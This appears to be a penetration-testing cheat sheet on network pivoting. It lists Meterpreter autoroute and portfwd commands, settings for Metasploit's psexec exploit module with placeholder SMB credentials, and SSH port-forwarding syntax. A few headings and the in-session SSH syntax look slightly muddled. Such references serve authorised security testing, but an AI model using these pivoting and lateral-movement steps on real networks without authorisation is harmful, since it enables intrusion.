Tunneling & Pivoting

Please keep in mind the IP address of the target host, the port you want to connect to and the local port that will become unavailable while listening for and interacting with the target port.

`autoroute`

run autoroute -s [subnet] -n [netmask]

s [subnet]: The subnet to add.

n [netmask]: The netmask of the subnet.

Example:

run autoroute -s 192.168.10.0 -n 255.255.255.0

`portfwd`

Configure autoroute

To use the portfwd feature in Meterpreter, follow these steps:

portfwd add -L 127.0.0.1 -l [local_port] -p [remote_port] -r [remote_host]

l [local_port]: The port on the local machine where Meterpreter is running.

p [remote_port]: The port on the remote machine (target system).

r [remote_host]: The IP address of the remote machine (target system).

Example:

Within a meterpreter session

meterpreter> portfwd add -L 127.0.0.1 -l <rhp> -r 192.168.30.9 -p 445

Pivoting

Configure portfwd

Setup PSExec
1. background
1. use exploit windows/smb/psexec
1. set lhost 172.16.10.15
1. set lport <rhp>
1. set rhost 127.0.0.1
1. set rport <rhp>
1. set smbuser <user>
1. set smbdomain <domain.root>
1. set smbpass <password>

SSH Tunneling

When initiating the tunnel during session creation

ssh -C -L 8080:<target IP address>:80 user@remote_host

When initiating the tunnel from within the target’s ssh session

ssh> -C -L 8080:<local IP address>:80

Port Forwarding

Syntax:

# Remote Host
ssh -C -L [local_port]:[remote_host]:[remote_port] [user]@[ssh_server]
# Local Host
ssh> -C -L [local_port]:[local_host]:[remote_port]

-L [local_port]: The local port on your machine.

-C: Enables compression.

[remote_host]: The remote host you want to connect to (can be localhost if connecting to the SSH server itself).

[remote_port]: The remote port on the remote host.

[user]: The username for SSH login.

[ssh_server]: The SSH server to connect to.